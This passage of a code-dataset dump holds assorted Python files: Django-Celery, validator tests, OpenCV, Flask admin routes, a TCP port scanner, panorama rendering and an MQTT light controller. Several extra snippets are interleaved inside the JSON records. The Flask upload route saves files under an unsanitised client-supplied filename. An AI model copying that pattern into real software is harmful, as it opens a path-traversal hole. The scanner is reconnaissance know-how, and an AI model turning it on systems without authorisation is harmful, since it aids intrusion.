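print(grundy('()()'))   # 0 -> first player loses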
setting\n tenant_cache_seconds = int(cls._get_app().conf.task_tenant_cache_seconds)\n except AttributeError:\n tenant_cache_seconds = 0 # default\n\n if cached_value is missing:\n cached_value = get_tenant_model().objects.get(schema_name=schema_name)\n cache.set(\n schema_name, cached_value, expire_seconds=tenant_cache_seconds\n )\n\n return cached_value\n\n def _update_headers(self, kw):\n kw[\"headers\"] = kw.get(\"headers\") or {}\n self._add_current_schema(kw[\"headers\"])\n\n def _add_current_schema(self, kwds):\n kwds[\"_schema_name\"] = kwds.get(\"_schema_name\", connection.schema_name)\n\n def apply(self, args=None, kwargs=None, *arg, **kw):\n if celery.VERSION[0] < 4:\n kwargs = kwargs or {}\n self._add_current_schema(kwargs)\n\n else:\n # Celery 4.0 introduced strong typing and the `headers` meta dict.\n self._update_headers(kw)\n return super(TenantTask, self).apply(args, kwargs, *arg, **kw)\n","repo_name":"maciej-gol/tenant-schemas-celery","sub_path":"tenant_schemas_celery/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"37"} +{"seq_id":"27885302251","text":"from tests.unit.dataactcore.factories.staging import FABSFactory\nfrom tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n\n_FILE = 'fabs15_1'\n\n\ndef test_column_headers(database):\n expected_subset = {'row_number', 'legal_entity_country_code', 'legal_entity_foreign_city', 'record_type',\n 'uniqueid_AssistanceTransactionUniqueKey'}\n actual = set(query_columns(_FILE, database))\n assert expected_subset == actual\n\n\ndef test_success(database):\n \"\"\" Test success LegalEntityForeignCityName is required for foreign recipients (i.e., when\n LegalEntityCountryCode != USA) for non-aggregate and PII-redacted non-aggregate records (RecordType = 2 or 3)\n \"\"\"\n\n fabs_1 = FABSFactory(legal_entity_country_code='Japan', legal_entity_foreign_city='Tokyo', record_type=2,\n correction_delete_indicatr='')\n fabs_2 = FABSFactory(legal_entity_country_code='UK', legal_entity_foreign_city='Manchester', record_type=3,\n correction_delete_indicatr=None)\n fabs_3 = FABSFactory(legal_entity_country_code='USA', legal_entity_foreign_city=None, record_type=2,\n correction_delete_indicatr='c')\n fabs_4 = FABSFactory(legal_entity_country_code='UsA', legal_entity_foreign_city='', record_type=3,\n correction_delete_indicatr='C')\n fabs_5 = FABSFactory(legal_entity_country_code='UK', legal_entity_foreign_city='', record_type=1,\n correction_delete_indicatr='')\n fabs_6 = FABSFactory(legal_entity_country_code='CAN', legal_entity_foreign_city=None, record_type=1,\n correction_delete_indicatr='')\n # Ignore correction delete indicator of D\n fabs_7 = FABSFactory(legal_entity_country_code='Canada', legal_entity_foreign_city='', record_type=3,\n correction_delete_indicatr='d')\n\n errors = number_of_errors(_FILE, database, models=[fabs_1, fabs_2, fabs_3, fabs_4, fabs_5, fabs_6, fabs_7])\n assert errors == 0\n\n\ndef test_failure(database):\n \"\"\" Test failure LegalEntityForeignCityName is required for foreign recipients (i.e., when\n LegalEntityCountryCode != USA) for non-aggregate and PII-redacted non-aggregate records (RecordType = 2 or 3)\n \"\"\"\n\n fabs = FABSFactory(legal_entity_country_code='Japan', legal_entity_foreign_city=None, record_type=2,\n correction_delete_indicatr='')\n fabs_2 = FABSFactory(legal_entity_country_code='Canada', legal_entity_foreign_city='', record_type=3,\n 
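# The FABS15-1 tests above exercise one rule: foreign recipients
# (country code != USA) on record types 2 and 3 must carry a foreign city,
# and rows whose correction_delete_indicatr is 'd'/'D' are skipped. The rule
# as a plain predicate (illustrative sketch, not the broker's SQL):
def violates_fabs15_1(country, city, record_type, cdi):
    if (cdi or '').lower() == 'd':
        return False
    return (country.upper() != 'USA'
            and record_type in (2, 3)
            and not (city or '').strip())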
correction_delete_indicatr='c')\n\n errors = number_of_errors(_FILE, database, models=[fabs, fabs_2])\n assert errors == 2\n","repo_name":"fedspendingtransparency/data-act-broker-backend","sub_path":"tests/unit/dataactvalidator/test_fabs15_1.py","file_name":"test_fabs15_1.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"13671756509","text":"import cv2 as cv\nimport numpy as np\n\n\ndef show_circles(img, location):\n \"\"\"show pictures in colour with the location of iris\n location list of circles to print to picture\n img: rbg picture of eye\n \"\"\"\n cv.circle(img, (location[0], location[1]), location[2], (135, 0, 40), 1)\n cv.circle(img, (location[0], location[1]), 1, (60, 190, 160), 1)\n\n\ndef find_circles(img, param2=130, min_size=0):\n while True:\n temp = cv.HoughCircles(img, cv.HOUGH_GRADIENT, 1,\n 10, minRadius=min_size, param1=300, param2=param2)\n if temp is not None:\n break\n param2 += -1\n return temp[0][0]\n\n\ndef fill_holes(img):\n \"\"\"Fill holes in binary image\"\"\"\n hight = img.shape[0]\n width = img.shape[1]\n\n im_flood = ~img.copy()\n\n mask = np.zeros((hight+2, width+2), np.uint8)\n cv.floodFill(im_flood, mask, (0, 0), 255)\n\n pic_final = im_flood & img\n\n return pic_final\n","repo_name":"SuroWka-Roch/eye_detection","sub_path":"circles.py","file_name":"circles.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17583059551","text":"# admin.routes\nfrom app import app\nfrom app import db\nfrom app.models import Slider,Categories\nimport os\nfrom admin.forms import CategoryForm\nfrom flask import render_template,request,redirect,url_for\n\n@app.route('/admin')\ndef admin_index():\n return render_template('admin/index.html')\n\n# slider routes\n\n@app.route('/admin/slider',methods = ['GET','POST'])\ndef admin_slider():\n slides = Slider.query.all()\n if request.method=='POST':\n file = request.files['s_photo']\n filename = file.filename\n file.save(os.path.join(app.config['UPLOAD_FOLDER'],filename))\n\n slide = Slider(\n s_title = request.form['s_title'],\n s_header = request.form['s_header'],\n s_url = request.form['s_url'],\n s_photo = filename\n )\n\n db.session.add(slide)\n db.session.commit()\n return redirect('/admin/slider')\n return render_template('admin/slider.html',slides = slides)\n\n@app.route('/admin/categories',methods=['GET','POST'])\ndef admin_categories():\n form = CategoryForm()\n categories = Categories.query.all()\n if request.method=='POST':\n category = Categories(\n cat_name=form.cat_name.data\n )\n db.session.add(category)\n db.session.commit()\n return redirect('/admin/categories')\n return render_template('admin/categories.html',form=form,categories = categories)","repo_name":"FikratMammadov/PragmatechFoundationProject","sub_path":"Python/FinalProject/admin/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26378471685","text":"import socket\nimport argparse\nimport threading\nfrom queue import Queue\n\n# Версия с использованием многопоточности и очередей, чтобы не сканировать один и тот же порт по несолько раз\n#\n# Парсим аргум��нты\n# Первым идёт имя хоста, потом порты с и до какого проверять\n# Если ограничение до какого проверять не передано, то будет проверен только начальный порт\nparser 
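# A classic variant of the fill_holes() idea above: flood-fill the
# background from a corner, invert that to get only the holes, then OR with
# the input. Assumes (0, 0) is background in the binary image (sketch only):
import cv2 as cv
import numpy as np

def fill_holes_classic(img):
    h, w = img.shape[:2]
    flooded = img.copy()
    mask = np.zeros((h + 2, w + 2), np.uint8)
    cv.floodFill(flooded, mask, (0, 0), 255)
    return img | cv.bitwise_not(flooded)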
= argparse.ArgumentParser('TCP port scanner')\nparser.add_argument('hostname', help='enter hostname')\nparser.add_argument('start_port', help='port to start from')\nparser.add_argument('end_port', help='last port to check')\n\narguments = parser.parse_args()\nhostname = arguments.hostname\nstart_port = int(arguments.start_port)\nend_port = int(arguments.end_port)\n\n# Получаем ip адрес хоста\nip = socket.gethostbyname(hostname)\n# Создадим очередь, куда положим номера портов для проверки\nqueue = Queue()\n# И список куда будем складывать открытые порты\nopen_ports = []\n\n# Функция которая сканирует переданный порт, если удалось подключиться, то успех\ndef scan_port(port):\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Создаем сокет\n sock.connect((ip, port)) # Пытаемся подключиться\n return True\n except:\n return False\n\n\n# Метод который положит выбранные порты в очередь\ndef ports_to_queue(start, end):\n for p in range(start, end + 1):\n queue.put(p)\n\n\n# Пишем метод, с помощью которого поток будет выполнять необходимую функцию\ndef worker():\n # Пока очередь не пуста берём из неё порт\n while not queue.empty():\n port = queue.get()\n if scan_port(port):\n open_ports.append(port)\n\n\n# Заполним очередь\nports_to_queue(start_port, end_port)\n\n# Создадим список потоков\nthread_list = []\n\n# Создадим потоки\nfor t in range(500):\n thread = threading.Thread(target=worker)\n thread_list.append(thread)\n\n# Запускаем потоки работать\nfor t in thread_list:\n t.start()\n\n# Ждём завершения работы всех потоков из списка\nfor t in thread_list:\n t.join()\n\n# Выводим информацию об открытых портах\nfor i in sorted(open_ports):\n print(f'Порт {i} открыт')\n\n# Запишем её в файл\nwith open('result.txt', 'w') as res:\n res.write(f'У хоста {hostname} открыты следующие порты: ' + str(sorted(open_ports))[1:-1])\n","repo_name":"Gleb1nho/TCP_scanner","sub_path":"multithreading_tcp_scanner.py","file_name":"multithreading_tcp_scanner.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22414229453","text":"import os\n\nimport cv2\nimport imutils\nimport numpy as np\n\n\ndef FindElement(imgGray, img):\n # Перебор блоков из папки\n ###\n images = []\n folder = os.path.dirname(os.path.realpath(__file__)) + '\\Templates'\n for filename in os.listdir(folder):\n img_dir = os.path.join(folder, filename)\n if img_dir is not None:\n images.append(img_dir)\n ###\n\n Arr_of_blocks = []\n #Цикл обработки и записи координат блоков\n for i in images:\n template = cv2.imread(i, 1)\n template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\n template = cv2.Canny(template, 50, 200)\n w, h = template.shape[::-1]\n found = None\n #Если не удалось найти с первого раза блок, то сжимается изображение и снова идет поиск\n for scale in np.linspace(0.2, 1.0, 20)[::-1]:\n resized = imutils.resize(img, width=int(img.shape[1]*scale))\n r = img.shape[1] / float(resized.shape[1])\n if resized.shape[0] < h or resized.shape[1] < w:\n break\n edg = cv2.Canny(resized, 50, 200)\n res = cv2.matchTemplate(edg, template, cv2.TM_CCOEFF_NORMED)\n (_, maxVal, _, maxLoc) = cv2.minMaxLoc(res)\n if found is None or maxVal > found[0]:\n found = (maxVal, maxLoc, r)\n (_, maxLoc, r) = found\n (SX, SY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))\n (EX, EY) = (int((maxLoc[0]+w)*r), int((maxLoc[1]+h)*r))\n cv2.rectangle(img, (SX, SY), (EX, EY), (255, 0, 255), 1)\n cv2.putText(img, SX.__str__() + ' ' + SY.__str__() + ' ' + 
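# A common refinement of the scanner's scan_port() above: connect_ex()
# returns an error code instead of raising, and a timeout keeps closed or
# filtered ports from stalling a worker thread (sketch):
import socket

def port_open(ip, port, timeout=0.5):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((ip, port)) == 0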
EX.__str__() + ' ' + EY.__str__(), (SX, SY), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0), lineType=cv2.LINE_AA)\n Arr = [SX, SY, EX, EY, i]\n Arr_of_blocks.append(Arr)\n print(Arr_of_blocks)\n return Arr_of_blocks\n","repo_name":"SkVoReC9/Diplom","sub_path":"FindFunc.py","file_name":"FindFunc.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71400492589","text":"\"\"\" Full assembly of the parts to form the complete network \"\"\"\n\nimport torch.nn as nn\nfrom Model.noise_decompositon_Net import Noise_Decomposition_Net\nfrom Model.non_rigid_alignment_Net import Non_Rigid_Alignment_Net\nfrom Model.sparse_complement_Net import Sparse_Complement_Net\n\n\nclass LowRankNet(nn.Module):\n def __init__(self, n_channels, n_classes, num_ch=16, bilinear=True):\n super(LowRankNet, self).__init__()\n self.n_channels = n_channels\n self.n_classes = n_classes\n self.bilinear = bilinear\n \n self.Noise_Decomposition_Net = Noise_Decomposition_Net(n_channels, n_classes, num_ch)\n self.Non_Rigid_Alignment_Net = Non_Rigid_Alignment_Net(n_channels, 2, num_ch)\n self.Sparse_Complement_Net = Sparse_Complement_Net(n_channels, n_classes, num_ch)\n\n def forward(self, input):\n '''\n Args:\n input (Batch, Channel, Height, Width)\n Return:\n A (torch.): Denoised input imgs, \n Aτ: Aligned A,\n τ: Flow \n S: Sparse complement of Aτ\n '''\n\n A = self.Noise_Decomposition_Net(input)\n Aτ, τ = self.Non_Rigid_Alignment_Net(A)\n S = self.Sparse_Complement_Net(Aτ)\n return A, Aτ, τ, S\n","repo_name":"asanomitakanori/Unsupervised-Deep-Non-Rigid-Alignment-by-Low-Rank-Loss-and-Multi-Input-Attention","sub_path":"Model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4128373362","text":"import cairosvg\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\nboard = 'ZoeaT'\nboard = 'ZoeaB'\nboard = 'HermitT'\n# board = 'HermitB'\nlayer = 'Edge_Cuts'\nroot = '/Users/akihiro/repos/Hermit/{}/'.format( board )\npath_svg = root + 'layer/{}-{}.svg'.format( board, layer )\npath_png = root + 'svg.png'\npath_txt = root + 'Edge_Fill.txt'\npath_dist = root + 'dist.png'\ncairosvg.svg2png( url = path_svg, write_to = path_png, dpi = 254 )\nif True:\n png = Image.open( path_png )\n cairosvg.svg2png( url = path_svg, write_to = path_png, dpi = 254,\n output_width = png.size[0] + 2, output_height = png.size[1] + 2 )\n\npng = Image.open( path_png )\nprint( f'png size = {png.size}' )\n# voi: x width\nix0 = png.size[0]\nix1 = 0\nfor ix in range( png.size[0] ):\n for iy in range( 0, png.size[1], 5 ):\n _, _, _, a = png.getpixel( (ix, iy) )\n a = 255 if a >= 128 else 0\n if a == 255:\n ix0 = min( ix0, ix )\n ix1 = max( ix1, ix )\n break\n# ix0 -= 1\n# ix1 += 1\nw = ix1 - ix0 + 1\nprint( \"ix = ({}, {}), width = {}\".format( ix0, ix1, w ) )\n\n# voi: y height\niy0 = png.size[1]\niy1 = 0\nfor iy in range( png.size[1] ):\n for ix in range( 0, png.size[0], 5 ):\n _, _, _, a = png.getpixel( (ix, iy) )\n a = 255 if a >= 128 else 0\n if a == 255:\n iy0 = min( iy0, iy )\n iy1 = max( iy1, iy )\n break\n# iy0 -= 1\n# iy1 += 1\nh = iy1 - iy0 + 1\nprint( \"iy = ({}, {}), height = {}\".format( iy0, iy1, h ) )\n\nmask = np.zeros( (h, w), np.uint8 )\nfor y in range( h ):\n iy = y + iy0\n for x in range( w ):\n ix = x + ix0\n if 0 <= ix and ix < png.size[0] and 0 <= iy and iy < png.size[1]:\n _, _, _, a = png.getpixel( (ix, iy) 
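# A self-contained check of the matchTemplate/minMaxLoc pipeline used in
# FindElement above, on a synthetic image so no template files are needed.
# A textured 20x20 patch is planted at (x=30, y=40) and the match recovers it.
import cv2
import numpy as np

img = np.zeros((100, 100), np.uint8)
patch = (np.arange(400) % 256).astype(np.uint8).reshape(20, 20)  # non-constant texture
img[40:60, 30:50] = patch
template = patch.copy()

res = cv2.matchTemplate(img, template, cv2.TM_CCOEFF_NORMED)
_, max_val, _, max_loc = cv2.minMaxLoc(res)
print(max_loc, round(max_val, 3))  # expected: (30, 40) ~1.0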
)\n else:\n a = 0\n v = 0 if a >= 64 else 255\n mask[y, x] = v\n\nif False:\n retval, labels = cv2.connectedComponents( mask )\n label = labels[h >> 1, w >> 1]\n print( f'#labels = {retval}, label = {label}' )\nelse:\n retval, labels, stats, centroids = cv2.connectedComponentsWithStats( mask )\n total_area = w * h\n max_area = -1\n for idx, (x, y, _, _, area) in enumerate( stats ):\n if area > total_area / 8:\n print( f'idx = {idx}, area = {area} total = {total_area}' )\n if max_area < area:\n max_area = area\n label = idx\n print( f'#labels = {retval}, label = {label}, max_area = {max_area}' )\n#fill_mask = np.zeros( (h + 2, w + 2), np.uint8 )\n#cv2.floodFill( mask, fill_mask, (h >> 1, w >> 1), 255, 0, 128, 4 | cv2.FLOODFILL_FIXED_RANGE )\n\nmask1 = np.zeros( (h, w), np.uint8 )\nmask2 = np.zeros( (h, w), np.uint8 )\nfor y in range( h ):\n for x in range( w ):\n inside = (labels[y, x] == label)\n mask1[y, x] = 255 if inside else 0\n mask2[y, x] = 0 if inside else 255\nprint( 'done largest label mask' )\n\ndist1 = cv2.distanceTransform( mask1, cv2.DIST_L2, cv2.DIST_MASK_PRECISE )\ndist2 = cv2.distanceTransform( mask2, cv2.DIST_L2, cv2.DIST_MASK_PRECISE )\ndist1 = cv2.GaussianBlur( dist1, ksize = (7, 7), sigmaX = 0.7 )\ndist2 = cv2.GaussianBlur( dist2, ksize = (7, 7), sigmaX = 0.7 )\nprint( 'done distance transform' )\n\n# dist = Image.new( 'RGB', (w, h) )\ndist = np.empty((h, w, 3), np.uint8)\nfor y in range( h ):\n for x in range( w ):\n inside = True if mask1[y, x] != 0 else False\n val = dist1[y, x] if inside else dist2[y, x]\n val = int( round( val * 3 ) )\n val = min( max( val, 0), 255 )\n r = 255 if inside else 0\n b = 0 if inside else 255\n g = val\n # dist.putpixel( (x, y), (r, g, b))\n dist[y, x, 0] = r\n dist[y, x, 1] = g\n dist[y, x, 2] = b\ndist = Image.fromarray( dist )\ndist.save( path_dist )\nprint( f'saved {path_dist}' )\n\n# dump to text file\nwith open( path_txt, 'w' ) as fout:\n fout.write( '{}\\n'.format( w ) )\n fout.write( '{}\\n'.format( h ) )\n for y in range( h ):\n line = ''\n for x in range( w ):\n inside = True if mask1[y, x] != 0 else False\n val = dist1[y, x] if inside else -dist2[y, x]\n line += '{:.0f},'.format( val * 10 )\n fout.write( line + '\\n' )\nprint( f'saved {path_txt}' )\n","repo_name":"orihikarna/Hermit","sub_path":"python/svg2png.py","file_name":"svg2png.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"72739044262","text":"from datetime import date\r\nTODAY = str(date.today())\r\n\r\ndef my_copyright4(name, email, date=TODAY):\r\n line1 = \"*** programmed by \"+name+ \" for MSDM5002 ***\"\r\n length = len(line1)\r\n line3 = 'date: '+ date\r\n text_length = length - 10 \r\n \r\n if (length - (len(line3)+6)) % 2 == 1:\r\n space_gap1 = (length - (len(line3)+6)) // 2\r\n space_gap2 = (length - (len(line3)+6)) // 2 + 1\r\n else:\r\n space_gap1 = (length - (len(line3)+6)) // 2\r\n space_gap2 = (length - (len(line3)+6)) // 2\r\n \r\n line4 = '***' + '-' * (length - 6) + '***'\r\n \r\n text = 'You can use it as you like, but there might be many bugs. 
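# The per-pixel Python loops in svg2png.py above dominate the runtime for
# large boards; the same signed-distance image falls out of a few NumPy
# expressions. A sketch under the same assumptions (labels, label, dist1,
# dist2 defined as in the script):
import numpy as np

def signed_distance_image(labels, label, dist1, dist2):
    inside = labels == label
    val = np.where(inside, dist1, dist2)
    g = np.clip(np.rint(val * 3), 0, 255).astype(np.uint8)
    out = np.zeros(labels.shape + (3,), np.uint8)
    out[..., 0] = np.where(inside, 255, 0)  # red marks the board interior
    out[..., 1] = g                         # green encodes distance magnitude
    out[..., 2] = np.where(inside, 0, 255)  # blue marks the exterior
    return out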
If you\\\r\n find some bugs, please send them to \"'+email+'\"\"'\r\n word_list = text.split(' ')\r\n \r\n print(\"*\" * length)\r\n print(line1)\r\n print('***'+' '*space_gap1+line3+' '*space_gap2+'***') #center!\r\n print(line4)\r\n\r\n while word_list :\r\n i = 0 \r\n current_length = 0\r\n while(current_length <= text_length):\r\n i += 1\r\n current_length = 0\r\n \r\n for j in range(i):\r\n if j < len(word_list): \r\n if j == 0: \r\n current_length += (len(word_list[j]))\r\n else:\r\n current_length += (len(word_list[j])+1)\r\n else:\r\n current_length = text_length + 1\r\n break\r\n \r\n line11 =''\r\n for j in range(i-1):\r\n if j == 0:\r\n line11 += (word_list[j])\r\n else:\r\n line11 += (' '+word_list[j])\r\n \r\n \r\n del word_list[0:i-1]\r\n \r\n if len(word_list) == 1: #the situation that email it too long\r\n remaining = word_list[0][(text_length-len(line11)-1):len(word_list[0])-1]\r\n line11 += ' '+word_list[0][0:(text_length-len(line11)-1)]\r\n print('*** '+line11+' ***')\r\n \r\n if len(remaining) <= text_length:\r\n print('*** '+remaining+' '*(text_length-len(remaining))+' ***')\r\n del word_list[0]\r\n else:\r\n while(len(remaining) > text_length):\r\n print('*** '+remaining[0:text_length]+' ***')\r\n remaining = remaining[text_length:]\r\n if len(remaining) <= text_length:\r\n print('*** '+remaining+' '*(text_length-len(remaining))+' ***')\r\n print(\"*\" * length)\r\n return #that is the end!\r\n \r\n else:\r\n line11 += ' '*(text_length-len(line11))\r\n print('*** '+line11+' ***')\r\n \r\n #ending-------------------------------- \r\n print(\"*\" * length)\r\n \r\n return","repo_name":"Grain-6/Auto-copyright-statements","sub_path":"my_copyright4.py","file_name":"my_copyright4.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36586593960","text":"from old import utils_envmap\nimport numpy as np\nfrom PIL import Image\nimport math\nfrom pathlib import Path\nfrom skylibs.envmap import EnvironmentMap\nimport matplotlib.pyplot as plt\nimport cv2\n\nnp.set_printoptions(formatter={'float': '{: 0.5f}'.format})\n\n\ndef plot_image(img):\n plt.imshow(img)\n plt.show()\n\n\nwidth_resolution = 2048\nnumber_of_cameras = 3\ncameras_to_keep = 2\ncameras_to_keep_range = tuple(range(1, cameras_to_keep + 1))\n# envmap_type = 'latlong'\nenvmap_type = 'cube'\n\nin_path = 'images/' + str(width_resolution) + \"/\" + str(number_of_cameras) + '/360render_'\nout_path = \"out/envmap/\" + envmap_type + '/' + str(width_resolution) + \"/\" + str(number_of_cameras) + \"/keep_\" + str(\n cameras_to_keep_range[-1]) + \"/\"\nout_path_flow = out_path + 'optical_flow'\nPath(out_path_flow).mkdir(parents=True, exist_ok=True)\n\ncamera_angles = []\n\nenv_map_panos = []\npanos_opencv = []\n\nfor i in range(number_of_cameras):\n e = EnvironmentMap(in_path + str(i) + '.jpg', 'latlong')\n if envmap_type == 'cube':\n e = e.convertTo('cube')\n env_map_panos.append(e)\n\n img = cv2.cvtColor((e.data * 255).astype(np.uint8), cv2.COLOR_RGB2BGR)\n\n cv2.imwrite(out_path + \"original_\" + str(i) + '.jpg', img)\n\n panos_opencv.append(img)\n\n angle = (1 + 2 * i) * math.pi / number_of_cameras + math.pi / 2\n camera_angles.append(angle)\n\nheight, width, channels = env_map_panos[0].data.shape\n\n# optical_flows = optical_flow.calculate_optical_flows_between_panoramas(panos_opencv, out_path)\n\nrho_range = np.linspace(0.5, 5, 10)\n# rho_range = [3.0]\n\nfor rho in rho_range:\n print(\"\\nStarting rho =\", rho)\n 
pano_side_list = ['_left_eye.jpg', '_right_eye.jpg']\n\n camera_points = utils_envmap.create_all_camera_points(camera_angles)\n\n x, y, z, valid = env_map_panos[0].worldCoordinates()\n\n projection_points = utils_envmap.create_all_projection_points(rho, x, y, z)\n\n eye_points = utils_envmap.create_all_eyes_points(projection_points)\n\n camera_vectors_cartesian_coordinates, camera_vectors_spherical_coordinates = utils_envmap.create_all_cameras_vectors(\n projection_points, camera_angles)\n\n\n new_pano_list = []\n min_angles_index_list = []\n min_angles_ratio_list = []\n best_cameras_vectors_cartesian_list = []\n\n for new_pano_index in range(2):\n new_pano_list.append(np.zeros((height, width, channels)).reshape((-1, 3)))\n\n eye_vectors = utils_envmap.create_eye_vectors(projection_points, eye_points[new_pano_index])\n\n angles = []\n\n for camera_vectors in camera_vectors_cartesian_coordinates:\n angles.append(utils_envmap.calculate_angles_between_vectors(eye_vectors, camera_vectors))\n\n angles = np.transpose(np.array(angles))\n\n min_angles, min_angles_index = utils_envmap.calculate_minimum_angles_and_indexes(angles, cameras_to_keep_range)\n\n min_angles_ratio = utils_envmap.calculate_angles_ratio(min_angles)\n\n intermediate_points = utils_envmap.calculate_intermediate_points(camera_points, min_angles_ratio, min_angles_index)\n\n min_angles_index_list.append(min_angles_index)\n\n min_angles_ratio_list.append(min_angles_ratio)\n\n best_camera_vectors_cartesian_coordinates = camera_vectors_cartesian_coordinates[\n min_angles_index,\n np.arange(camera_vectors_cartesian_coordinates.shape[1])[:, None],\n :\n ]\n\n best_cameras_vectors_cartesian_list.append(best_camera_vectors_cartesian_coordinates)\n\n for pano_side, new_pano, min_angles_index, best_camera_vectors_cartesian_coordinates in zip(pano_side_list,\n new_pano_list,\n min_angles_index_list,\n best_cameras_vectors_cartesian_list):\n for i in range(len(env_map_panos)):\n for j in range(cameras_to_keep):\n index = np.argwhere(min_angles_index[:, j] == i)\n\n xyz = np.squeeze(best_camera_vectors_cartesian_coordinates[index, j, :])\n\n u, v = env_map_panos[i].world2image(xyz[:, 0], xyz[:, 1], xyz[:, 2])\n\n u = (u * width).astype(np.int)\n v = (v * height).astype(np.int)\n\n u = np.where(u >= width, width - 1, u)\n v = np.where(v >= height, height - 1, v)\n\n new_pano[index, :] += env_map_panos[i].data[v, u, :][:, None]\n\n new_pano = (new_pano.reshape(height, width, channels) * 255 / cameras_to_keep).astype(np.uint8)\n\n if envmap_type == 'cube':\n eye_pano_cube = Image.fromarray(new_pano)\n save_path = out_path + \"cubemap_rho_\" + str(rho) + pano_side\n eye_pano_cube.save(save_path)\n print(\"Saved cubemap representation in :\", save_path)\n\n eye_pano_latlong = EnvironmentMap(new_pano, 'cube')\n eye_pano_latlong = eye_pano_latlong.convertTo('latlong')\n eye_pano_latlong = Image.fromarray(eye_pano_latlong.data.astype(np.uint8))\n save_path = out_path + \"rho_\" + str(rho) + pano_side\n eye_pano_latlong.save(save_path)\n else:\n eye_pano_latlong = Image.fromarray(new_pano)\n save_path = out_path + \"rho_\" + str(rho) + pano_side\n eye_pano_latlong.save(save_path)\n\n print(\"Saved latlong representation in :\", save_path)\n","repo_name":"LucaBlanchout/panorama_generation","sub_path":"old/old_env_map_main.py","file_name":"old_env_map_main.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"28581578983","text":"#import machine\r\nfrom 
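# The stereo code above gathers, per pixel, the rows of its best cameras with
# `array[min_angles_index, np.arange(N)[:, None], :]`. A tiny demo of that
# advanced-indexing pattern on toy shapes (3 cameras, 4 pixels, xyz vectors):
import numpy as np

vecs = np.arange(3 * 4 * 3).reshape(3, 4, 3)       # (camera, pixel, xyz)
best = np.array([[0, 2], [1, 0], [2, 1], [0, 1]])  # 2 best cameras per pixel
picked = vecs[best, np.arange(4)[:, None], :]      # -> shape (4, 2, 3)
print(picked.shape)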
machine import RTC\r\nimport time\r\nfrom time import sleep\r\nimport os\r\nimport ujson\r\nfrom umqtt.simple import MQTTClient\r\n################# main for light ########################\r\ndef savestate():\r\n global status, BUSY\r\n statusfile = open('status', 'w')\r\n myjson = ujson.dumps(status)\r\n statusfile.write(str(myjson))\r\n statusfile.close()\r\n print(\"saved\" + str(status))\r\n \r\ndef received(topic, inmsg):\r\n global status, BUSY, ROOT_TOPIC\r\n if not BUSY and topic != ROOT_TOPIC + b'white/state' and topic != ROOT_TOPIC + b'rgb/state':\r\n BUSY = True\r\n #print(topic, inmsg)\r\n msg = inmsg.decode('utf-8')\r\n print(msg)\r\n ##############WHITE######################\r\n if topic == ROOT_TOPIC + b'white/switch':\r\n print('ESP received switch')\r\n \r\n newset = ujson.loads(msg)\r\n print(newset)\r\n status['white']['state'] = newset.get('state', status['white']['state'])\r\n status['white']['brightness'] = newset.get('brightness', status['white']['brightness'])\r\n if status['white']['state'] == 'ON':\r\n WHITE_PIN.duty(status['white']['brightness'])\r\n else:\r\n WHITE_PIN.duty(0)\r\n client.publish(ROOT_TOPIC + b'white/state', str(ujson.dumps(status['white'])))\r\n savestate()\r\n ########################rgb#######################\r\n if topic == ROOT_TOPIC + b'version?':\r\n print('ESP version request')\r\n client.publish(ROOT_TOPIC + b'version', 'Version 2021.091')\r\n if topic == ROOT_TOPIC + b'rgb/switch':\r\n print('RGB received switch')\r\n newset = ujson.loads(msg)\r\n print(newset)\r\n status['rgb']['state'] = newset.get('state', status['rgb']['state'])\r\n status['rgb']['brightness'] = newset.get('brightness', status['rgb']['brightness'])\r\n status['rgb']['color'] = newset.get('color', status['rgb']['color'])\r\n if status['rgb']['state'] == 'ON':\r\n BRIGHTMULTIPLIER = float(status['rgb']['brightness'] / 1024)\r\n red = int(float(status['rgb']['color']['r'] /255) *1024)\r\n red = int(red * BRIGHTMULTIPLIER )\r\n green = int(float(status['rgb']['color']['g'] /255) * 1024)\r\n green = int(green * BRIGHTMULTIPLIER)\r\n blue = int(float(status['rgb']['color']['b'] /255) * 1025)\r\n blue = int(blue * BRIGHTMULTIPLIER)\r\n print(\"red is:\" + str(red))\r\n print(\"green is:\" + str(green))\r\n print(\"blue is:\" + str(blue))\r\n RED_PIN.duty(int(red))\r\n GREEN_PIN.duty(int(green))\r\n BLUE_PIN.duty(int(blue))\r\n else:\r\n RED_PIN.duty(0)\r\n GREEN_PIN.duty(0)\r\n BLUE_PIN.duty(0)\r\n client.publish(ROOT_TOPIC + b'rgb/state', str(ujson.dumps(status['rgb'])))\r\n savestate()\r\n BUSY = False\r\n else:\r\n print('.', end='')\r\n\r\ndef connect_and_subscribe():\r\n global CLIENT_ID, BROKER_ADDRESS, ROOT_TOPIC, client, SWITCH_PIN\r\n try:\r\n 